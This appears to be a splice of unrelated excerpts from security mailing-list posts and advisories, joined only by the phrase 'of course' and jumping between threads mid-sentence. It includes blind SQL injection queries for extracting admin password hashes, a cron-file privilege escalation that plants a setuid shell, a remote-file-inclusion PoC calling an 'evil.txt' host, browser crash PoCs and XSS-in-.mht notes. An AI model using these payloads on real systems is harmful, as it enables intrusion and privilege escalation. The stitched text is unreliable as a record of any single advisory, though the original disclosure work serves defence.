Of course
Probably you, not having any information about what actually happened
and because you totally mixed up the Secunia advisory with ours, decided to
send such an email blaming us.
> And I'd like to ask ALL SECURITY RESEARCHERS (of course including
> Rodrigo and Wagner).
>
> For what do you research security? What is your "security"? To
> protect people from threat? Or throw people into crisis? Do you
> recognize effects of your halfway job like this case?
@Condition be true.
So we can replace @Condition with a query like
EXISTS (SELECT * FROM blazedb.dbo.aspnet_Membership WHERE
(LEN(Password) < 32) AND UserId=??)
and then brute force on the length and then on each character of the
password (of course
we first need to extract the user id from the username with another query like
the one above and then fill ?? with
the user id of the admin, which is the same process).
+--> Exploiting The Stored XSS Vulnerability:
> Hi Kingcope,
>
> ....but if the 'sudoers' file is correctly configured then you would not
> have the appropriate sudo permission to run the 'sudoedit' as root.
>
> ....of course I'm assuming that the 'sudoers' file has not got the 'run
> any command' in it.
>
> If the sudoers file used is even the default then I would think you would
> get some error on the lines of:
>
this and immediately think "birthday paradox", but there is no "birthday
paradox" here: You aren't looking for pairs in an ever-growing set,
you're looking for matches against a fixed set. If you use 30-bit
hashes - giving you about a 120KB table - the chance that any given
key happens to hash to something in the table is one in a billion,
now and forever. (Of course, if you use a given key repeatedly, and
it happens to be that 1 in a billion, it will hit every time. So an
additional table of "known good keys that happen to collide" is worth
maintaining. Even if you somehow built and maintained that table for
all the keys across all the systems in the world - how big would it
get, if only 1 in a billion keys world-wide got entered?)
IV. NOTES
---------------------------------------
* Here's a snippet of the final reply that I received from the vendor:
"Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work. As you know, the users should know the security issues as they will run this and not us."
V. SOLUTION
---------------------------------------
* There is no update released at this time. Avoidance of this software is recommended until an updated version is available.
- Gallery -- begins to scan all images in phone memory and card, and
crashes soon, obviously when it encounters nokiacrash.jpg. So, just
putting this file anywhere in the filesystem is Gallery DoS.
- Web Browser -- does nothing when typing file:///E:/nokiacrash.jpg, but
crashes upon <IMG SRC=nokiacrash.jpg> in HTML file (of course,
Settings->Page->Load Content have to be set to "Images" or "All",
otherwise IMG tags are skipped).
_________________________________________
Dmitry Yu. Bolkhovityanov
- (NEW) Ads Management (Add, Edit & Delete)
- News management (add, edit & delete)
- Download management (add, edit & delete)
- Login
- Add administrator
- Logout (of course)
Member Panel Features:
- Automatically views all your current characters when you login (name, level, kills etc)
- Change account password
- Delete account
Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.
(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).
If someone wants to create an init script that would automate this at boot for
their distribution, I'm sure it would be appreciated by other administrators.
The difference here is that renaming the admin also offers some mitigation against local (e.g., non-networked) attacks for when the same person that can't be bothered to lock their session is rewarded with the latest d1psh1t virus when they download their porn-mule update. Installing the OS on something other than C: and renaming the admin account (regardless of the password) thwarts (sound of water dripping) most common local-attack methods. Simple and effective.
IOW:
1. no, this is not a "vulnerability in software", but build process failure by the OEM. As others have pointed out, this is frequently done to allow "ease of recovery" for the user.
2. there is no expectation (sadly) that OEM will perform any sort of security configuration on their products; typically, this is what "Bob's Security Suite" is intended to accomplish (I know...)
3. anyone leaving their session unlocked when they're removed from it for any length of time is a fuul (IMHO). It takes barely more than 0 seconds to hit <WIN>-L as you move away from the keyboard. ..of course, this habit may be offset by a 4-character password policy...
-----Original Message-----
From: Mike Wilson [mailto:mwilson@amedisys.com]
Sent: Thursday, May 14, 2009 1:14 PM
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion in Firefox 3.6.3 (latest) <= means Firefox can't put text into the body element, and then it crashes.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Of course, a variation of the PoC made a NULL pointer deref, so it may also be code execution ( 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( to now... there doesn't exist any reliable exploit, so I disclosed to bugtraq first )
The appearance may vary depending on your font selection; see
http://lcamtuf.coredump.cx/switch/reference.jpg for a sample capture.
If you know the special role of "data:", this won't fool you. But most
browser users don't, even if they grasp the basics of URL syntax to
begin with (of course, that part itself is not true in all too many
cases).
PS. It is probably better known that a less convincing variant of this
can be achieved with javascript: URLs in MSIE and some other browsers.
# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit
# Setup a cronjob to give us privileges (of course, there are dozens of other
# ways this could be exploited).
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
# Wait a few minutes...
$ ls -l /tmp/exploit
---------
**********************************
ok, now we see the code in the control/login.php file
and in this file I see the vulnerable code that can be used by an attacker or anonymous user to bypass the login section..
it's also possible to gain administrator access ( if you're lucky of course :D )
here is the code in the control/login.php file:
**********************************
<?php
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
>cmd=id
*Of course* this does not work. Setting register_globals to "On" causes the
contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be
registered in the global variable namespace. But the superglobals
*themselves* are special. They shadow everything - you cannot define your own
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If
that were possible, using the superglobals would be useless; all scripts
To test the mitigation, you can use this pared-down proof-of-concept:
[body onload="for(var i=0; i!=10000; i++) ev.srcElement"]
[img src=. onerror="ev=createEventObject(event); outerHTML++"]
(Of course, replace [ and ] with < and > above. The 'for' loop is
just a kludge to make it more likely to crash.)
If you're interested in researching the vulnerability (using this
PoC), breakpoint MSHTML!CImgElement::CImgElement, then run until
MSHTML!CTreeNode::CTreeNode is hit -- this tree node is freed during
WTF!? This looks like fix for PHP code execution vulnerability, but there are no such vulnerabilities!
Hey, Rodrigo and Wagner, do YOU see the above as fix for XSS? Really?
So, the XSS was not fixed in v11.6.1. Of course the exploit code that was posted by Rodrigo, was available in many site until February 14, 2012.
XSS vulnerability in WordPress and its plugin is too dangerous because if attacker gets full privileges of admin user by that vulnerability, he can write and execute any PHP code by using theme editing feature (if the target file is writable).
As you can see, what Rodrigo has done is throw every cforms user into crisis and nothing more.
Interesting (and serendipitous, at that <g>).
ISA Server 2004+ allows you to configure "allowed / denied methods" in any rule for which the web proxy is involved; effectively nullifying this attack.
..of course, this requires the web devs to communicate the minimum required methods for their site - something I've rarely seen expressed with any real authority.
Jim
-----Original Message-----
From: Arshan Dabirsiaghi [mailto:arshan.dabirsiaghi@aspectsecurity.com]
Hi there,
It works because there is a "Content-Location" header in the .mht file, so
our malicious code will be there.
"Content-Location" is outside <html></html>, so it will work only in IE
(with the .htm extension, of course).
Example code of .mht file with XSS:
[...]
Content-Type: text/html;